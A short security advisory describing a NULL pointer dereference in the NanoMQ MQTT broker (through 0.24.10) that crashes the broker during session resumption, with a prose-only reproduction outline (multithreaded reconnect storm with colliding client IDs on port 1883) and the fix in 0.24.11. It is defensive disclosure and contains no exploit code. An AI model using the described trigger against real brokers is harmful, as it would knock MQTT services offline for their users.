NanoMQ MQTT Broker NULL Pointer Dereference Leading to Denial-of-Service Vulnerability

A denial-of-service vulnerability has been identified in NanoMQ MQTT Broker versions through 0.24.10. When the broker experiences high-concurrency reconnect traffic with a reconnect-collision payload, it can crash due to a NULL pointer dereference. This issue arises during the MQTT session resumption for clients with clean_start set to 0. The problem occurs because the transport's p_peer callback iterates over a subscription information list without checking for NULL pointers. Under certain conditions, this can lead to a process crash.

Impact

Exploitation of this vulnerability causes the NanoMQ broker process to crash, terminating the MQTT service and disrupting any active connections or message deliveries.

Reproduction

The vulnerability can be reproduced by starting NanoMQ with an AddressSanitizer-instrumented build, which is available in the release version 0.24.10-14. After starting the broker, a Python script can be used to simulate a high-concurrency reconnect storm by sending a specific payload that causes client ID collisions. This payload can be sent over TCP to the MQTT default port, 1883, using multiple threads to replicate the conditions that trigger the NULL pointer dereference and subsequent crash.

Remediation

Users can upgrade to NanoMQ version 0.24.11, which addresses the vulnerability by adding the necessary NULL checks in the transport peer callback functions.